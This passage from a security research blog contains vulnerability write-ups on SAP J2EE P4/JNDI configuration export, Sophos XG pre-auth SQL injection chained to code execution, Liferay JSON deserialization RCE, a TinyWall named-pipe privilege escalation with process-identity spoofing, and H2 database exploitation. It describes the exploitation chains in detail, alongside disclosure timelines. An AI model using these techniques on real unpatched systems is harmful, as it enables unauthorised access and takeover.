However, whenever you install a SAP J2EE Engine, the P4 port is enabled by default and listening on the same network interface as the HTTP(s) services. Because I was totally focussing on Deserialization, for a long time I was oblivious how much information one can glean through the JNDI context. E.g. it is trivial to get all bindings: The list() call allows to simply iterate through all bindings:

Interesting items are proxy objects and the _Stub objects. E.g. the proxy for messaging.system.MonitorBean can be cast to com.sap.engine.messaging.app.MonitorHI.

During debugging of the server, I had already encountered the class JUpgradeIF_Stub, long before I executed the call from Listing 5. The class has a method openCfg(String path) and it was not difficult to establish that the server version of the call didn't perform any authorization check. This one definitively looked fishy to me, but since I wasn't looking for unprotected RMI calls I put the finding into the box with the label "check on a rainy sunday afternoon when the kids are busy with someone else". But then, eventually, I did check it. It didn't take long to realize that I had found a huge problem. Compare Listing 6. The configuration settings of SAP J2EE Engine are organized in a hierarchical structure. The location of an object can be specified by a path, pretty much like a path of a file in the file system. The above code gets a reference to the JUpgradeIF_Stub by querying the JNDI context with name "MigrationService", gets an instance of a Configuration object by a call to openCfg() and then walks down the path to the leaf node. The element found there can be exported to an archive that is stored in the file system of the server (call to export(String path)). If carefully chosen, the local path on the server will point to a root folder of a web application. There, download.zip can simply be downloaded through HTTP. If you want to check for yourself, the UME configuration is stored at cluster_config/system/custom_global/cfg/services/com.sap.security.core.ume.service/properties.

You'd probably say "hey! I need to be Administrator to do that! Where's the harm?". Right, I thought so, too. But neither do you need to be Administrator, nor do you even have to be authenticated. The following code works perfectly fine: So does the enumeration using ctxt.list() from Listing 5. The fact that authentication is not needed at this point is not new at all by the way, compare CVE-2017-5372.

However, you will get a permission exception when calling keysMngr.getKeystore() (because getKeystore() does have a permission check). But JUpgradeIF.openCfg() was missing the check until SAP fixed it.

At this point, even without SAP specific knowledge an attacker can cause significant harm. E.g. flood the server's file system with archives causing a resource exhaustion DoS condition.

With a little insider knowledge one can get admin access. In the configuration tree, there is a keystore called TicketKeystore. Its cryptographic key pair is used to sign SAP Logon Tickets. If you steal the keystore, you can issue a ticket for the Administrator user and log on with full admin rights. There are also various other keystores, e.g. for XML signatures and the like (let alone the fact that there is tons of stuff in this store. No one probably knows all the security sensitive things you can get access to ...)

This information should be sufficient to the understanding of CVE-2021-21481. The exact location of the keystores in the configuration and the relative local path in order to download the archive by HTTP are left as an exercise to the reader.

Sophos XG - A Tale of the Unfortunate Re-engineering of an N-Day and the Lucky Find of a 0-Day

code white | Blog

By: Jakob Heusinger ＆amp； Matteo Tomaselli

13 July 2020 at 14:46

On April 25, 2020, Sophos published a knowledge base article (KBA) 135412 which warned about a pre-authenticated SQL injection (SQLi) vulnerability, affecting the XG Firewall product line. According to Sophos this issue had been actively exploited at least since April 22, 2020. Shortly after the knowledge base article, a detailed analysis of the so called Asnarök operation was published. Whilst the KBA focused solely on the SQLi, this write up clearly indicated that the attackers had somehow extended this initial vector to achieve remote code execution (RCE).

The criticality of the vulnerability prompted us to immediately warn our clients of the issue. As usual we provided lists of exposed and affected systems. Of course we also started an investigation into the technical details of the vulnerability. Due to the nature of the affected devices and the prospect of RCE, this vulnerability sounded like a perfect candidate for a perimeter breach in upcoming red team assessments. However, as we will explain later, this vulnerability will most likely not be as useful for this task as we first assumed.

Our analysis not only resulted in a working RCE exploit for the disclosed vulnerability (CVE-2020-12271) but also led to the discovery of another SQLi, which could have been used to gain code execution (CVE-2020-15504). The criticality of this new vulnerability is similar to the one used in the Asnarök campaign: exploitable pre-authentication either via an exposed user or admin portal. Sophos quickly reacted to our bug report, issued hotfixes for the supported firmware versions and released new firmware versions for v17.5 and v18.0 (see also the Sophos Community Advisory).

I am Groot

The lab environment setup will not be covered in full detail since it is pretty straight forward to deploy a virtual XG firewall. Appropriate firmware ISOs can be obtained from the official download portal. What is notable is the fact that the firmware allows administrators direct root shell access via the serial interface, the TelnetConsole.jsp in the web interface or the SSH server. Thus there was no need to escape from any restricted shells or to evade other protection measures in order to start the analysis.

Device Management -> Advanced Shell -> /bin/sh as root.

After getting familiar with the filesystem layout, exposed ports and running processes we suddenly noticed a message in the XG control center informing us that a hotfix for the n-day vulnerability, we were investigating, had automatically been applied.

Control Center after the automatic installation of the hotfix (source).

We leveraged this behavior to create a file-system snapshot before and after the hotfix. Unfortunately diffing the web root folders in both snapshots (aiming for a quick win) resulted in only one changed file with no direct indication of a fixed SQL operation.

Architecture

In order to understand the hotfix, it was necessary to delve deep into the underlying software architecture. As the published information indicated that the issue could be triggered via the web interface we were especially interested in how incoming HTTP requests were processed by the appliance.

Both web interfaces (user and admin) are based on the same Java code served by a Jetty server behind an Apache server.

Jetty server on port 8009 serving /usr/share/webconsole.

Most interface interactions (like a login attempt) resulted in a HTTP POST request to the endpoint /webconsole/Controller. Such a request contained at least two parameters: mode and json. The former specified a number which was mapped internally to a function that should be invoked. The latter specified the arguments for this function call.

The corresponding Servlet checked if the requested function required authentication, performed some basic parameter validation (code was dependent on the called function) and transmitted a message to another component - CSC.

This message followed a custom format and was sent via either UDP or TCP to port 299 on the local machine (the firewall). The message contained a JSON object which was similar but not identical to the json parameter provided in the initial HTTP request.

JSON object sent to CSC on port 299.

The CSC component (/usr/bin/csc) appeared to be written in C and consisted of multiple sub modules (similar to a busybox binary). To our understanding this binary is a service manager for the firewall as it contained, started and controlled several other jobs. We encountered a similar architecture during our Fortinet research.

Multiple different processes spawned by the CSC binary.

CSC parsed the incoming JSON object and called the requested function with the provided parameters. These functions however, were implemented in Perl and were invoked via the Perl C language interface. In order to do so, the binary loaded and decrypted an XOR encrypted file (cscconf.bin) which contained various config files and Perl packages.

Another essential part of the architecture were the different PostgreSQL database instances which were used by the web interface, the CSC and the Perl logic, simultaneously.

The three PostgreSQL databases utilized by the appliance.

High level overview of the architecture.

Locating the Perl logic

As mentioned earlier, the Java component forwarded a modified version of the JSON parameter (found in the HTTP request) to the CSC binary. Therefore we started by having a closer look at this file. A disassembler helped us to detect the different sub modules which were distributed across several internal functions, but did not reveal any logic related to the login request. We did however find plenty of imports related to the Perl C language interface. This led us to the assumption that the relevant logic was stored in external Perl files, even though an intensive search on the filesystem had not returned anything useful. It turned out, that the missing Perl code and various configuration files were stored in the encrypted tar.gz file (/_conf/cscconf.bin) which was decrypted and extracted during the initialization of CSC. The reason why we previously could not locate the decrypted files was that these could only be found in a separate linux namespace.

As can be seen in the screenshot below the binary created a mount point and called the unshare syscall with the flag parameter set to 0x20000. This constant translates to the CLONE_NEWNS flag, which disassociates the process from the initial mount namespace.

For those unfamiliar with Linux namespaces: in general each process is associated with a namespace and can only see, and thus use, the resources associated with that namespace. By detaching itself from the initial namespace the binary ensures that all files created after the unshare syscall are not propagated to other processes. Namespaces are a feature of the Linux kernel and container solutions like docker heavily rely on them.

Calling unshare, to detach from the initial namespace, before extracting the config.

Therefore even within a root shell we were not able to access the extracted archive. Whilst multiple approaches exist to overcome this, the most appealing at that point was to simply patch the binary. This way, it was possible to copy the extracted config to a world-writable path. In hindsight, it would probably have been easier to just scp nsenter to the appliance.

Accessing the decrypted and extracted files by jumping into the namespace of the CSC binary.

From a handful of information to the N-Day (CVE-2020-12271)

The rolled out hotfix boiled down to the modification of one existing function (_send) and the introduction of two new functions (getPreAuthOperationList and addEventAndEntityInPayload) in the file /usr/share/webconsole/WEB-INF/classes/cyberoam/corporate/CSCClient.class.

The function getPreAuthOperationList defined all modes which can be called unauthenticated. The function addEventAndEntityInPayload checks if the mode specified in the request is contained in the preAuthOperationsList and removes the Entity and Event keys from the JSON object if that is the case.

Analysis

Based on the hotfix we assumed that the vulnerability must reside within one of the functions specified in the getPreAuthOperationList. However, after browsing through the relevant Perl code in order to find blocks that made use of the Entity or Event key, we were pretty confident that this was not the case.

What we did notice though is that regardless of which mode we specify, every request was processed by the apiInterface function. Sophos denoted the functions mapped to the mode parameter internally as opcodes.

The apiInterface function was also the place where we finally found the SQLi vulnerability aka execution of arbitrary SQL statements. As is depicted in the source excerpt below, this opcode called the executeDeleteQuery function (line 27) which took a SQL statement from the query parameter and ran it against the database.

Unfortunately, in order to reach the vulnerable code, our payload needed to pass every preceding CALL statement which enforced various conditions and properties on our JSON object.

The first call (validateRequestType) required that Entity was not set to securitypolicy and that the request type was ORM after the call.

The preceding call (variableInitialization) initialized the Perl environment and should always succeed. In order to keep our request simple and not to introduce additional requirements, the Entity value in our payload should not be one of the following: securityprofile, mtadataprotectionpolicy, dataprotectionpolicy, firewallgroup, securitypolicy, formtemplate or authprofile. This allowed us to skip the checks performed in the function opcodePreProcess.

The checkUserPermission function does what its name suggests. Whereas, the function body that can be seen below is only executed if the JSON object passed to Perl included a __username parameter. This parameter was added by the Java component before the request was forwarded to the CSC binary, if the HTTP request was associated with a valid user session. Since we used an unauthenticated mode in our payload, the __username parameter was not set and we could ignore the respective code.

To skip over the preMigration call we just had to choose a mode which was unequal to 35 (cancel_firmware_upload), 36 (multicast_sroutes_disable) or 1101 (unknown). On top of that all three modes required authentication making them unusable for our purposes, anyway.

Depending on the request type, the function createModeJSON employed a different logic to load the Perl module connected to the specified entity. Whereas each POST request initially started as ORM request, we needed to be careful that the request type was not changed to something else. This was required to satisfy the last if statement before the vulnerable function was called inside the apiInterface function. Therefore the condition on line 15 had to be not satisfied. The respective code checked if the request type specified in the loaded Perl module equaled ORM. We leave the identification of such an Entity as an exercise to the interested reader.

We skipped the call to the migrateToCurrVersion function since it was not important for our chain. The next call to createJson verified if the previously loaded Perl package could actually be initialized and would always work as long as it referred to an existing Entity.

The function handleDeleteRequest once again verified that the request type was ORM. After removing duplicate keys from our JSON, it ensured that our JSON payload contained a name key. The code then looped through all values which were specified in our name property and searched for foreign references in other database tables in order to delete these. Since we did not want to delete any existing data we simply set the name to a non-existing value.

We skipped the last two function calls to replyIfErrorAtValidation and getOldObject because they were not relevant to our chain and we had already walked through enough Perl code.

What did we learn so far?

We need a mode which can be called from an unauthenticated perspective.
We should not use certain Entities.
Our request needed to be of type $REQUEST_TYPE{ORMREQUEST}.
The request had to contain a name property which held some garbage value.
The EventProperties of the loaded Entity, and in particular the DELETE property, had to set the ORM value to true.
Our JSON object had to contain a query key which held the actual SQL statement we wanted to execute.

When we satisfied all of the above conditions we were able to execute arbitrary SQL statements. There was only one caveat: we could not use any quotes in our SQL statements since the csc binary properly escaped those (see the escapeRequest sub 0-day chapter for details). As a workaround we defined strings with the help of the concat and chr SQL functions.

From SQLi to RCE

Once we had gained the ability to modify the database to our needs, there were quite a few places where the SQLi could be expanded into an RCE. This was the case because parameters contained within the database were passed to exec calls without sanitation in multiple instances. Here we will only focus on the attack path which was, based on our understanding and the details released in Sophos' analysis, used during the Asnarök campaign.

According to the published information, the attackers injected their payloads in the hostname field of the Sophos Firewall Manager (SFM) to achive code execution. SFM is a separate appliance to centrally manage multiple appliances. This raised the question: what happens in the back end if you enable the central administration?

To locate the database values related to the SFM functionality we dumped the database, enabled SFM in the front end, and created another dump. A diff of the dumps was then used to identify the changed values. This approach revealed the modification of multiple database rows. The attribute CCCAdminIP in the table tblclientservices was the one used by the attackers to inject their payload. A simple grep for CCCAdminIP directed us to the function get_SOA in the Perl code.

As can be seen on line 15, the code retrieves the value of the CCCAdminIP from the database and passes it unfiltered into the EXECSH call on line 22. Due to some kind of cronjob the get_SOA opcode is executed regularly leading to the automatic execution of our payload.

What made this particular attack chain very unfortunate was the if condition on line 11, as it allowed us to reach the EXECSH call only if the automatic installation of hotfixes is active (which is the default setting) and if the appliance is configured to use SFM for central management (which is not the default setting). This resulted in a situation in which the attackers most likely only gained code execution on devices with activated auto-updates - leading to a race condition between the hotfix installation and the moment of exploitation.

Installations that do not have automatic hotfixes enabled or have not moved to the latest supported maintenance releases could still be vulnerable.

Gaining code execution via the SQLi described in CVE-2020-12271.

From N to Zero (CVE-2020-15504)

Another promising approach for discovery of the n-day, instead of starting at a patch diff, seemed to be an analysis of all back end functions (callable via the /webconsole/Controller endpoint) which did not require authentication. The respective function numbers could, for example, be extracted from the Java function getPreAuthOperationList.

SQL-Injection countermeasures inside the Perl logic

Despite of the fact that the back end performed all its SQL operations without prepared-statements, those were not automatically susceptible to injection.

The reason for this was, that all function parameters coming in via port 299 were automatically escaped via the escapeRequest function before being processed.

So everything is safe?

One function which caught our attention was RELEASEQUARANTINEMAILFROMMAIL (NR 2531) as the corresponding logic silently bypassed the automatic escaping. This happened because the function treated one of the user-controllable parameters as a Base64 string and used this parameter, decoded, inside a SQL statement. As the global escaping took place before the function was actually called, it only ever saw the encoded string and thus missed any included special characters such as single quotes.

After the parameter was decoded, it was split into different variables. This was done by parsing the string based on the key=value syntax used in HTTP requests. We were concentrating on the hdnFilePath variable, as its value did not need to satisfy any complicated conditions and ended up in the SQL statement later on.

The only constraint for $requestData{hdnFilePath} was, that it did not contain the sequence ../ (which was irrelevant for our purposes anyway). After crafting a release parameter in the appropriate format we were now able to trigger a SQLi in the above SELECT statement. We had to be careful to not break the syntax by taking into account that the manipulated parameter was inserted six times into the query.

Triggering a database sleep through the discovered SQL-I (6s delay as the sleep command was injected 6 times).

Upgrading the boring Select statement

The ability to trigger a sleep enables an attacker to use well known blind SQLi techniques to read out arbitrary database values. The underlying Postgres instance (iviewdb) differed from the one targeted in the n-day. As this database did not seem to store any values useful for further attacks, another approach was chosen.

With the code-execution technique used by Asnarök in mind, we aimed for the execution of an INSERT operation alongside a SELECT. In theory, this should be easily achievable by using stacked queries. After some experimentation, we were able to confirm that stacked queries were supported by the deployed Postgres version and the used database API. Yet, it was impossible to get it to work through the SQLi. After some frustration, we found out that the function iviewdb_query (/lib/libcscaid.so) called the escape_string (/usr/bin/csc) function before submitting the query. As this function escaped all semicolons in the SQL statement, the use of stacked queries was made impossible.

Giving up yet?

At this point, we were able to trigger an unauthenticated SQL Injection in a SELECT statement in the iviewdb database, which did not provide us with any meaningful starting points for an escalation to RCE. Not wanting to abandon the goal of achieving code execution we brainstormed for other approaches. Eventually we came up with the following idea - what if we modified our payload in such a way that the SQL statement returned values in the expected form? Could this allow us to trigger the subsequent Perl logic and eventually reach a point where a code execution took place? Constructing a payload which enabled us to return arbitrary values in the queried columns took some attempts but succeeded in the end.

Execution of a SELECT statement which returns values specified inside the payload.

After we had managed to construct such a payload we concentrated on the subsequent Perl logic. Looking at the source we found a promising EXEC call just after the database query. And one of the parameters for that call was derived from a variable under user control.

Unfortunately, the variable $g_ha_mode (most likely related to the high availability feature) was set to false in the default configuration. This prompted us to look for a better way. The function mergequarantine_manage did not contain any further exec calls but triggered two other Perl functions in the same file, under the right conditions. Those functions were triggered via the apiInterface opcode which generated a new CSC request on port 299.

In our case $request->{action} was always set to release restricting us to a call to manage_quarantine. This function used its submitted parameters (result-set from the query in mergequarantine_manage) to trigger another SELECT statement. When this statement returned matching values an EXEC call was triggered, which got one of the returned values as a parameter.

The question now was how the result-set of the second SELECT statement could be manipulated through the result-set of the first statement? How about returning values in the first query which would trigger a SQLi in the second statement? Because string concatenation was used to construct the statement this should have been possible in theory. Unfortunately, we were unable to obtain the desired results. This was after having invested quite a bit of work to craft such a payload. A brief analysis of how our payload was processed, revealed that it was somehow escaped before reaching the second query. As it turned out, the reason for this was actually pretty obvious. As the function was triggered via a new CSC request, it automatically passed through the previously described escape logic.

Time to accept our defeat and be happy with the boring SQLi? Not quite...

Desperately looking for other ways to weaponize the injection we dug deeper into the involved components. At an earlier stage we already created a full dump of the iviewdb database but did not pay too much attention to it after having realized that it did not include any useful information. On revisiting the database, one of its features - so called user-defined functions - heavily used by the appliance, stood out.

User-defined functions enable the extension of the predefined database operations by defining your own SQL functions. Those can be written in Postgres' own language: PL/pgSQL. What made such functions interesting for our attack was, that previously defined functions could be called in-line in SELECT statements. The call-syntax is the same as for any other SQL function, i.e. SELECT my_function(param1, param2) FROM table;.

The idea at this point was, that one of the existing user-defined functions might allow the execution of stacked queries. This would be the case as soon as a parameter was used for a SQL statement without proper filtering inside a function. Walking over the database dump revealed multiple code blocks matching this characteristic and to our surprise an even simpler way to execute arbitrary statements - the function execute. The respective code expected only one parameter which was directly executed as SQL statement without any further checks.

This function would, in theory, allow us to execute an INSERT statement inside the SELECT query of mergequarantine_manage. This could be then used to add database rows to the table tblquarantinespammailmerge which should later end up in the exec call in manage_quarantine.

Triggering an INSERT statement via the execute function from within a SELECT statement.

After fiddling around for quite some time we were finally able to construct an appropriate payload (see below).

Explanation:

Line 1-2: Defining the two HTTP parameters needed for mode 2531.
Line 3-6: Defining the three Base64 encoded parameters, that are needed to pass the initial checks in mergequarantine_manage.
Line 7: Triggering the SQLi by injecting a single quote.
Line 8-11: Utilizing the user-defined function execute in order to trigger different SQL operations than the predefined SELECT.
Line 10: Adding a new row to the table tblquarantinespammailmerge that contains our code-execution payload in the field quarantinearea and sets messageid to 'a'. Note the .eml portion inside the payload, which is required to reach the exec call.
Line 9: Delete all rows from tblquarantinespammailmerge where the messageid equals 'a'. This ensures that the mentioned table contains our payload only once (remember that the vector is injected 6x in the initial statement). Whereas this is not absolutely necessary it simplifies the path taken after the SELECT statement in manage_quarantine and prevents our payload to be executed multiple times.
Line 12-14: Needed to comply with the syntax of the predefined statement.

Using the above payload resulted in the execution of the following Perl command:

So finally our job was done... but somehow there seemed to be no time delay, which would indicate that our sleep has not actually triggered. But why? Did we not use exactly the same execution mechanism as in the n-day? Turns out - not quite. Asnarök used EXECSH we have EXEC. Unfortunately EXEC is treating spaces in arguments correctly by passing them in single values to the script.

I assume we better bury our heads in the sand

We had come to far to give up now, so we carried on. Finally we were able to execute code through the SQLi and it was good ol' Perl which allowed us to do so.

Adding this last piece to the attack chain and fixing a minor issue in the posted payload is left up to the reader.

Triggering a reverse shell by abusing the discovered vulnerability.

Timeline

04.05.2020 - 22:48 UTC: Vulnerability reported to Sophos via BugCrowd.
04.05.2020 - 23:56 UTC: First reaction from Sophos confirming the report receipt.
05.05.2020 - 12:23 UTC: Message from Sophos that they were able to reproduce the issue and are working on a fix.
05.05.2020: Roll out of a first automatic hotfix by Sophos.
16.05.2020 - 23:55 UTC: Reported a possible bypass for the added security measurements in the hotfix.
21.05.2020: Second hotfix released by Sophos which disables the pre-auth email quarantine release feature.
June 2020: Release of firmware 18.0 MR1-1 which contains a built-in fix.
July 2020: Release of firmware 17.5 MR13 which contains a built-in fix.
13.07.2020: Release of the blog post in accordance with the vendor after ensuring that the majority of devices either received the hotfix or the new firmware version.

We highly appreciate the quick response times, very friendly communication as well as the hotfix feature.

code white | Blog
Liferay Portal JSON Web Service RCE VulnerabilitiesMarkus Wulftange
20 March 2020 at 12:31

Liferay Portal JSON Web Service RCE Vulnerabilities

code white | Blog

By: Markus Wulftange

20 March 2020 at 12:31

Code White has found multiple critical rated JSON deserialization vulnerabilities affecting the Liferay Portal versions 6.1, 6.2, 7.0, 7.1, and 7.2. They allow unauthenticated remote code execution via the JSON web services API. Fixed Liferay Portal versions are 6.2 GA6, 7.0 GA7, 7.1 GA4, and 7.2 GA2.

The corresponding vulnerabilities are:

CST-7111: RCE via JSON deserialization (LPS-88051/LPE-16598¹): The JSONDeserializer of Flexjson allows the instantiation of arbitrary classes and the invocation of arbitrary setter methods.
CST-7205: Unauthenticated Remote code execution via JSONWS (LPS-97029/CVE-2020-7961): The JSONWebServiceActionParametersMap of Liferay Portal allows the instantiation of arbitrary classes and invocation of arbitrary setter methods.

Both allow the instantiation of an arbitrary class via its parameter-less constructor and the invocation of setter methods similar to the JavaBeans convention. This allows unauthenticated remote code execution via various publicly known gadgets.

Liferay released the patched versions 6.2 GA6 (6.2.5), 7.0 GA7 (7.0.6) and 7.1 GA4 (7.1.3) to address the issues; the version 7.2 GA2 (7.2.1) was already released in November 2019. For 6.1, there is only a fixpack available.

Introduction

Liferay Portal is one of the, if not even the most popular portal implementation as per Java Portlet Specification JSR-168. It provides a comprehensive JSON web service API at '/api/jsonws' with examples for three different ways of invoking the web service method:

Via the generic URL /api/jsonws/invoke where the service method and its arguments get transmitted via POST, either as a JSON object or via form-based parameters (the JavaScript Example)
Via the service method specific URL like /api/jsonws/service-class-name/service-method-name where the arguments are passed via form-based POST parameters (the curl Example)
Via the service method specific URL like /api/jsonws/service-class-name/service-method-name where the arguments are also passed in the URL like /api/jsonws/service-class-name/service-method-name/arg1/val1/arg2/val2/… (the URL Example)

Authentication and authorization checks are implemented within the invoked service methods themselves while the processing of the request and thus the JSON deserialization happens before. However, the JSON web service API can also be configured to deny unauthenticated access.

First, we will take a quick look at LPS-88051, a vulnerability/insecure feature in the JSON deserializer itself. Then we will walk through LPS-97029 that also utilizes a feature of the JSON deserializer but is a vulnerability in Liferay Portal itself.

CST-7111: Flexjson's `JSONDeserializer`

In Liferay Portal 6.1 and 6.2, the Flexjson library is used for serializing and deserializing data. It supports object binding that will use setter methods of the objects instanciated for any class with a parameter-less constructor. The specification of the class is made with the class object key:

This vulnerability was reported in December 2018 and has been fixed in the Enterprise Edition with 6.1 EE GA3 fixpack 71 and 6.2 EE GA2 fixpack 169² and also the 6.2 GA6.

CST-7205: Jodd's `JsonParser` + Liferay Portal's `JSONWebServiceActionParametersMap`

In Liferay Portal 7, the Flexjson library is replaced by the Jodd Json library that does not support specifying the class to deserialize within the JSON data itself. Instead, only the type of the root object can be specified and it has to be explicitly provided by a java.lang.Class object instance. When looking for the call hierarchy of write access to the rootType field, the following unveils:

While most of the calls have hard-coded types specified, there is one that is variable (see selected call on the right above). Tracing that parameterType variable through the call hierarchy backwards shows that it originates from a ClassLoader.loadClass(String) call with a parameter value originating from an JSONWebServiceActionParameters instance. That object holds the parameters passed in the web service call. The JSONWebServiceActionParameters object has an instance of a JSONWebServiceActionParametersMap that has a _parameterTypes field for mapping parameters to types. That map is used to look up the class for deserialization during preparation of the parameters for invoking the web service method in JSONWebServiceActionImpl._prepareParameters(Class<?>).

The _parameterTypes map gets filled by the JSONWebServiceActionParametersMap.put(String, Object) method:

Here the lines 102 to 110 are interesting: the typeName is taken from the key string passed in. So if a request parameter name contains a ':', the part after it specifies the parameter's type, i. e.:

This syntax is also mentioned in some of the examples in the Invoking JSON Web Services tutorial.

Later in JSONWebServiceActionImpl._prepareParameters(Class<?>), the ReflectUtil.isTypeOf(Class, Class) is used to check whether the specified type extends the type of the corresponding parameter of the method to be invoked. Since there are service methods with java.lang.Object parameters, any type can be specified.

This vulnerability was reported in June 2019 and has been fixed this in 6.2 GA6, 7.0 GA7, 7.1 GA4, and 7.2 GA2 by using a whitelist of allowed classes.

Demo

[1] There are two editions of the Liferay Portal: the Community Edition (CE) and the Enterprise Edition (EE). The CE is free and its source code is available at GitHub. Both editions have their own project and issue tracker at issues.liferay.com: CE has LPS-* and EE has LPE-*. LPS-88051 was created confidentially by Code White for CE and LPE-16598 was created publicly three days later for EE.
[2] Fixpacks are only available for the Enterprise Edition (EE) and not for the Community Edition (CE).

code white | Blog
CVE-2019-19470: Rumble in the PipeFlorian Hauser
17 January 2020 at 09:18

CVE-2019-19470: Rumble in the Pipe

code white | Blog

By: Florian Hauser

17 January 2020 at 09:18

This blog post describes an interesting privilege escalation from a local user to SYSTEM for a well-known local firewall solution called TinyWall in versions prior to 2.1.13. Besides a .NET deserialization flaw through Named Pipe communication, an authentication bypass is explained as well.

Introduction

TinyWall is a local firewall written in .NET. It consists of a single executable that runs once as SYSTEM and once in the user context to configure it. The server listens on a Named Pipe for messages that are transmitted in the form of serialized object streams using the well-known and beloved BinaryFormatter. However, there is an additional authentication check that we found interesting to examine and that we want to elaborate here a little more closely as it may also be used by other products to protect themselves from unauthorized access.

For the sake of simplicity the remaining article will use the terms Server for the receiving SYSTEM process and Client for the sending process within an authenticated user context, respectively. Keep in mind that the authenticated user does not need any special privileges (e.g. SeDebugPrivilege) to exploit this vulnerability described.

Named Pipe Communication

Many (security) products use Named Pipes for inter-process communication (e.g. see Anti Virus products). One of the advantages of Named Pipes is that a Server process has access to additional information on the sender like the origin Process ID, Security Context etc. through Windows' Authentication model. Access to Named Pipes from a programmatic perspective is provided through Windows API calls but can also be achieved e.g. via direct filesystem access. The Named Pipe filessystem (NPFS) is accessible via the Named Pipe's name with a prefix \\.\pipe\.

The screenshot below confirms that a Named Pipe "TinyWallController" exists and could be accessed and written into by any authenticated user.

Talking to SYSTEM

First of all, let's look how the Named Pipe is created and used. When TinyWall starts, a PipeServerWorker method takes care of a proper Named Pipe setup. For this the Windows API provides System.IO.Pipes.NamedPipeServerStream with one of it's constructors taking a parameter of System.IO.Pipes.PipeSecurity. This allows for fine-grained access control via System.IO.PipeAccessRule objects using SecurityIdentifiers and alike. Well, as one can observe from the first screenshot above, the only restriction seems to be that the Client process has to be executed in an authenticated user context which doesn't seem to be a hard restriction after all.

But as it turned out (again take a look at the screenshot above) an AuthAsServer() method is implemented to do some further checking. What we want is to reach the ReadMsg() call, responsible for deserializing the content from the message received.

If the check fails, an InvalidOperationException with "Client authentication failed" is thrown. Following the code brought us to a "authentication check" based on Process IDs, namely checking if the MainModule.FileName of the Server and Client process match. The idea behind this implementation seems to be that the same trusted TinyWall binary should be used to send and receive well-defined messages over the Named Pipe.

Since the test for equality using the MainModule.FileName property could automatically be passed when the original binary is used in a debugging context, let's verify the untrusted deserialization with a debugger first.

Testing the deserialization

Thus, to test if the deserialization with a malicious object would be possible at all, the following approach was taken. Starting (not attaching) the TinyWall binary out of a debugger (dnSpy in this case) would fulfill the requirement mentioned above such that setting a breakpoint right before the Client writes the message into the pipe would allow us to change the serialized object accordingly. The System.IO.PipeStream.writeCore() method in the Windows System.Core.dll is one candidate in the process flow where a breakpoint could be set for this kind of modification. Therefore, starting the TinyWall binary in a debugging session out of dnSpy and setting a breakpoint at this method immediately resulted in the breakpoint being hit.

Now, we created a malicious object with ysoserial.NET and James Forshaw's TypeConfuseDelegate gadget to pop a calc process. In the debugger, we use System.Convert.FromBase64String("...") as expression to replace the current value and also adjust the count accordingly.

Releasing the breakpoint resulted in a calc process running as SYSTEM. Since the deserialization took place before the explicit cast was triggered, it was already to late. If one doesn't like InvalidCastExceptions, the malicious object could also be put into a TinyWall PKSoft.Message object's Arguments member, an exercise left to the reader.

Faking the MainModule.FileName

After we have verified the deserialization flaw by debugging the client, let's see if we can get rid of the debugging requirement. So somehow the following restriction had to be bypassed:

The GetNamedPipeClientProcessId() method from Windows API retrieves the client process identifier for the specified Named Pipe. For a final proof-of-concept Exploit.exe our Client process somehow had to fake its MainModule.FileName property matching the TinyWall binary path. This property is retrieved from System.Diagnostics.ProcessModule's member System.Diagnostics.ModuleInfo.FileName which is set by a native call GetModuleFileNameEx() from psapi.dll. These calls are made in System.Diagnostics.NtProcessManager expressing the transition from .NET into the Windows Native API world. So we had to ask ourselves if it'd be possible to control this property.

As it turned out this property was retrieved from the Process Environment Block (PEB) which is under full control of the process owner. The PEB by design is writeable from userland. Using NtQueryInformationProcess to get a handle on the process' PEB in the first place is therefore possible. The _PEB struct is built of several entries as e.g. PRTL_USER_PROCESS_PARAMETERS ProcessParameters and a double linked list PPEB_LDR_DATA Ldr. Both could be used to overwrite the relevant Unicode Strings in memory. The first structure could be used to fake the ImagePathName and CommandLine entries but more interesting for us was the double linked list containing the FullDllName and BaseDllName. These are exactly the PEB entries which are read by the Windows API call of TinyWall's MainModule.FileName code. There is also a nice Phrack article from 2007 explaining the underlying data structures in great detail.

Fortunately, Ruben Boonen (@FuzzySec) already did some research on these kind of topics and released several PowerShell scripts. One of these scripts is called Masquerade-PEB which operates on the Process Environment Block (PEB) of a running process to fake the attributes mentioned above in memory. With a slight modification of this script (also left to the reader) this enabled us to fake the MainModule.FileName.

Even though the PowerShell implementation could have been ported to C#, we chose the lazy path and imported the System.Management.Automation.dll into our C# Exploit.exe. Creating a PowerShell instance, reading in the modified Masquerade-PEB.ps1 and invoking the code hopefully would result in our faked PEB entries of our Exploit.exe.

Checking the result with a tool like Sysinternals Process Explorer confirmed our assumption such that the full exploit could be implemented now to pop some calc without any debugger.

Popping the calc

Implementing the full exploit now was straight-forward. Using our existing code of James Forshaw's TypeConfuseDelegate code combined with Ruben Boonen's PowerShell script being invoked at the very beginning of our Exploit.exe now was extended by connecting to the Named Pipe TinyWallController. The System.IO.Pipes.NamedPipeClientStream variable pipeClient was finally fed into a BinaryFormatter.Serialize() together with the gadget popping the calc.

Thanks to Ruben Boonen's work and support of my colleague Markus Wulftange the final exploit was implemented quickly.

Responsible disclosure

The vulnerability details were sent to the TinyWall developers on 2019-11-27 and fixed in version 2.1.13 (available since 2019-12-31).

code white | Blog
Exploiting H2 Database with native libraries and JNIMarkus Wulftange
1 August 2019 at 12:54

Exploiting H2 Database with native libraries and JNI

code white | Blog

By: Markus Wulftange

1 August 2019 at 12:54

Techniques to gain code execution in an H2 Database Engine are already well known but require H2 being able to compile Java code on the fly. This blog post will show a previously undisclosed way of exploiting H2 without the need of the Java compiler being available, a way that leads us through the native world just to return into the Java world using Java Native Interface (JNI).

Introduction

Last week, the blog post Jackson gadgets - Anatomy of a vulnerability by Andrea Brancaleoni of Doyensec was published. It describes how a setter-based vulnerability in the Jackson library can be exploited if the libraries of Logback and H2 Database Engine are available. In short, it exploits the feature of H2 to create user defined functions with Java code that get compiled on the fly using the Java compiler.

But what if the Java compiler is not available? This was the exact case in a recent engagement where a H2 Dabatase Engine instance version 1.2.141 on a Windows system was exposing its web console. We want to walk you through the journey of finding a new way to execute arbitrary Java code without the need of a Java compiler on the target server by utilizing native libraries (.dll or .so) and the Java Native Interface (JNI).

Assessing the Capabilities of H2

Let's assume the CREATE ALIAS … AS … command cannot be used as the Java compiler is not available. A reason for that may be that it's not a Java Development Kit (JDK) but only a Java Runtime Environment (JRE), which does not come with a compiler. Or the PATH environment variable is not properly set up so that the Java compiler javac cannot be found.

However, the CREATE ALIAS … FOR … command can be used:

When referencing a method, the class must already be compiled and included in the classpath where the database is running. Only static Java methods are supported; both the class and the method must be public.

